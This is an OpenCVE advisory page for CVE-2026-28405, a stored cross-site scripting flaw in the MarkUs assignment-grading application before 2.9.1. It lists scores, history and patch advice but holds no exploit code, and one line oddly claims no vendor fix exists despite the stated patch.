Description
MarkUs is a web application for the submission and grading of student assignments. Prior to version 2.9.1, the courses/<:course_id>/assignments/<:assignment_id>/submissions/html_content route reads the contents of a student-submitted file and renders them without sanitization. This issue has been patched in version 2.9.1.
Published: 2026-03-05
Score: 8 High
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting in instructor context
Action: Patch Immediately
AI Analysis

Impact

The vulnerability resides in the /courses/<course_id>/assignments/<assignment_id>/submissions/html_content route, where content from student‑submitted HTML files is rendered without sanitization. Attackers can embed malicious scripts that execute in the browser of any instructor who views the affected submission, potentially hijacking their session or exfiltrating sensitive data. This is a classic stored XSS flaw (CWE‑79).

Affected Systems

MarkUsProject’s Markus application, versions prior to 2.9.1. The vulnerability is fixed in v2.9.1. No other versions are confirmed affected.

Risk and Exploitability

The CVSS base score of 8.0 classifies this as a high‑severity flaw. The EPSS score of less than 1% indicates a low probability of exploitation at present, and it has not been listed in CISA’s KEV catalog. Attackers can exploit the flaw by submitting a crafted assignment as a student and later tricking an instructor into opening that submission; no privileged access is required beyond the ability to view the page.

Generated by OpenCVE AI on April 16, 2026 at 12:10 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update Markus to version 2.9.1 or later, which removes the unsanitized rendering path.
  • If an update is not immediately possible, disable the HTML preview feature or enforce strict MIME type validation so that only plain text files are allowed for submission.
  • Ensure that any custom configuration does not re‑enable unsanitized rendering; review deployment settings and templates for hardcoded references to the html_content route.

Generated by OpenCVE AI on April 16, 2026 at 12:10 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 10 Mar 2026 20:00:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:markusproject:markus:*:*:*:*:*:*:*:*

Fri, 06 Mar 2026 17:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Fri, 06 Mar 2026 15:30:00 +0000

Type Values Removed Values Added
First Time appeared Markusproject
Markusproject markus
Vendors & Products Markusproject
Markusproject markus

Thu, 05 Mar 2026 20:30:00 +0000

Type Values Removed Values Added
Description MarkUs is a web application for the submission and grading of student assignments. Prior to version 2.9.1, the courses/<:course_id>/assignments/<:assignment_id>/submissions/html_content route reads the contents of a student-submitted file and renders them without sanitization. This issue has been patched in version 2.9.1.
Title MarkUs: Stored XSS in Submission HTML Preview Enables Instructor-Context Actions
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}

Subscriptions

Markusproject Markus
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-06T17:04:05.190Z

Reserved: 2026-02-27T15:33:57.289Z

Link: CVE-2026-28405

cve-icon Vulnrichment

Updated: 2026-03-06T17:04:00.884Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-05T21:16:21.707

Modified: 2026-03-10T19:53:01.670

Link: CVE-2026-28405

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-16T12:15:35Z

Weaknesses